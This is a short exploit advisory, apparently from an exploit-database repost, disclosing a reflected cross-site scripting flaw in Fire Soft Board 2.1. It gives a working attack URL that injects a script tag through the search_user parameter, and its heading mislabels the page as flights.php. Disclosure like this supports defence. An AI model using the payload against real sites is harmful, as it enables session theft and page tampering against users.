Fire Soft Board 2.1 Cross Site Scripting
Posted on 13 June 2016
# Exploit Title: FSB(Fire Soft Board)2 - Reflected Cross Site Scripting(index.php) # Date: 2016-06-10 # Exploit Author: HaHwul # Exploit Author Blog: www.hahwul.com # Vendor Homepage: http://www.fire-soft-board.com/ # Software Link: https://github.com/FSB/Fire-Soft-Board-2/archive/dev.zip # Version: 2.1 # Tested on: Debian [wheezy] # CVE : none ### Vulnerability Details ##################################################### # No filter for the search results # ############################################################################### ### XSS1 - flights.php Attack Code http://127.0.0.1/vul_test/Fire-Soft-Board-2/index.php?p=userlist&g_id=4 &order=u_total_post&direction=DESC&search_user="><script>alert(45)</script> &limit=30&like=&module=2&page=1 weak parameters - search_user ###############################################################################